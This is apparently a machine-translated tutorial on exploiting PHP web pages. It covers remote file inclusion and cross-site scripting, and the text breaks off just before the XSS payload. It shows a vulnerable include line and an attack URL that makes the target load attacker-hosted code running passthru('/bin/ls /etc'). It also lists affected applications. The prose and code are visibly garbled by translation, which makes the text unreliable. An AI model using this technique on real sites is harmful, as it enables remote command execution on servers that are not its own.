From now on network security, everyone is most concerned with the largest web page vulnerability should be ASP. In this regard, Xiaozhu is an expert, I didn't speak. However, in PHP, there is also very serious security. Question, but this article is not much. Here, discuss the relevant vulnerabilities of the PHP page slightly.
I have made a summary of the current PHP vulnerability, which is roughly divided into the following: including file vulnerabilities, script commands, and several types of file leaks, SQL injection vulnerabilities. Of course, some of the universal technology such as cookie spoofing Not discussed here, there are many online information. So, let's analyze how to take advantage of these vulnerabilities!
First, let's discuss the included file vulnerability. This vulnerability should be said to be a PHP. This is because the remote attacker can use these vulnerabilities to execute any of the Web process permission Command. Let's take an example: assume that there is such a code in A.php:
PHP
INCLUDE ($ include. "/ xxx.php");
?>
In this code, $ INCLUDE is usually a set path, but we can build a path to achieve an attack by yourself. For example, we will submit: a.php? Include = http: // web / b. PHP, this web is our space we use, of course, B.php is the code we use to attack. We can write in B.php Similar to: PASSTHRU ("/ bin / ls / etc") The code. This way, you can perform some purposeful attacks. (Note: The web server should not perform PHP code, otherwise it will be problematic. Related details Can see << How to attack common vulnerabilities in PHP programs >>). In this vulnerability, there are a lot of conditions, and in all directions: PayPal Store Front,
HotNews, Mambo Open Source, PHPDIG, YABB SE, PHPBB, Invisionboard, Solmetra Spaw Editor, Les Visiteurs, PHPGEDVIEW, X-CART, etc.
Next, let's take a look at the script command to perform a vulnerability. This is because the URI parameter submitted by the user lacks full filtering, submitting data containing malicious HTML code, which can cause the cross-station script attack, which may obtain the sensitive information of the target user. We also give an example: In the PHP TRANSPARENT PHP PHP 4.3.1, the index.php page in the following versions faces PHPSESSID lack full filtering, we can achieve the purpose of attack by this code: